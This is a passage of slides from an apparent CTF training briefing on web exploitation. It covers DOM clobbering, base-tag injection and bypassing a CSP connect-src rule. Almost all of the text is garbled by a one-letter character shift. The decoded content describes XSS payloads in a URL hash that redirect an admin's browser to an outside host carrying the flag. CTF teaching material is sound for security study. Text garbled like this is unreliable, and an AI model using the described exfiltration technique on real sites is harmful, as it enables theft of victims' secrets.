  80. )BTIUBHLBUBHBJUBJ$5' 'JOBMMZ ‣ *U`TQSPWFEUIBUMPDBUJPOBTTJHOJTDBMMFEXJUI MPDBUJPOIBTITMJDF   ‣ 4PVTJOHUIFMPDBUJPOIBTIMJLFCFMPXXJMM SFEJSFDUTCSPXTFSUPYTTNPF

    ‣ IUUQYTTNPFGPSNOBNFHFU&MFNFOU#Z*E GPSN ‣ 4PVTJOHUIFMPDBUJPOIBTIMJLFCFMPXXJMM SFEJSFDUTBENJO`TCSPXTFSUPYTTNPFXJUIUIF qBH ‣ IUUQYTTNPFGPSNOBNFHFU&MFNFOU#Z*E GPSN

  81. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  82. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  83. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  84. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  85. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  86. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  87. )BTIUBHLBUBHBJUBJ$5' -FU`TDMPCCFS%0. ‣ EFNP

  88. )BTIUBHLBUBHBJUBJ$5' &YQMPJUBUJPO ‣ 6TFUIFCBTFUBHJOKFDUJPOBOEDBQUVSFUIF qBH ‣ 4IPXZPVUIJTXJUIPVUFYFSDJTF

  89. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 5IJOHTUPEPBSFTBNFXJUIQSFWJPVTPOF ‣ $BVTFBOFSSPSBOENBLFUFNQSFNBJOCFJOHMPDBUJPO PCKFDU ‣ *OUIJTFYBNQMF QVUUJOHUPBMMZ$41

  90. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 4LJQQJOHBMMEFUBJMT KVTUVTF
 CBTFISFGlIUUQGPPCBSz ‣ lUFNQzWBSJBCMFDIBOHFTGSPNMPDBUJPOPCKFDU JOUP5FNQMBUFPCKFDUBUMJOF ‣

    /PXHFUJOUP5FNQMBUFPCKFDU temp = new Template('message.html');

  91. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 6TF$POTPMFJOEFWFMPQFSUPPMT

  92. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 5IFQBHFVTFTSFMBUJWFQBUIUPHFUUFNQMBUF pMF ‣ 4PJGCBTFUBHJTJOKFDUFE XFDBOPWFSSJEFSFRVFTU EFTUJOBUJPO ‣

    3FNFNCFSUIF$41QPMJDZ ‣ *UIBTBSVMFADPOOFDUTSDbTFMG`AUIBUSFTUSJDUT9)3 SFRVFTUTUPPUIFSPSJHJOT ‣ *GUIFEFTUJOBUJPOPGBSFRVFTUGPSHFUUJOHUFNQMBUFJT PUIFSPSJHJO $41WJPMBUJPOPDDVSTBOEJUDBVTFBO FSSPS

  93. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ 8IJDIFWFS63-ZPVVTFXJMMF⒎FDU ‣ #FDBVTFBOZUIJOHCVUUIFTBNFPSJHJODBVTFBO$41 WJPMBUJPOBOEBOFSSPS ‣ 4PVTJOHUIFMPDBUJPOIBTIMJLFCFMPXXJMMBMTP SFEJSFDUTBENJO`TCSPXTFSUPYTTNPFXJUIUIF

    qBH ‣ IUUQYTTNPFCBTFISFGIUUQGPPCBS

  94. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ EFNP

  95. )BTIUBHLBUBHBJUBJ$5' 3FWJFX ‣ EFNP

  96. 4VNNBSZ

  97. "OZRVFTUJPOT

  98. )BTIUBHLBUBHBJUBJ$5' 4VNNBSZ ‣ %0.JTDPNQMFUFMZNFTTFEVQ ‣ *U`TUIFDIBSN ‣ %PO`UGPSHFUUPVTFAWBSABOEAUSZDBUDIA ‣ #BEDPEFMFBETUPWVMOFSBCJMJUJFT

    ‣ 4PNFUJNFT UIFBUUBDLJOHTDFOBSJPJO$5'JT SFBMMZEJ⒏DVMUUPVOEFSTUBOE ‣ *NBHJOF

  99. )BTIUBHLBUBHBJUBJ$5' "DLOPXMFEHNFOU ‣ 5IJTCSJFpOHJTCBTFEPOUIJTXSJUFVQ ‣ IUUQTHJUIVCDPNDUGTXSJUFVQTUSFF NBTUFSIBDLMVDUGIPUDPXTEBUJOH ‣ 5IBOLTGPSBMMBUUFOEFFT ‣

    5IBOLTGPSNFNCFSTPGLBUBHBJUBJ

  100. 5IBOLZPV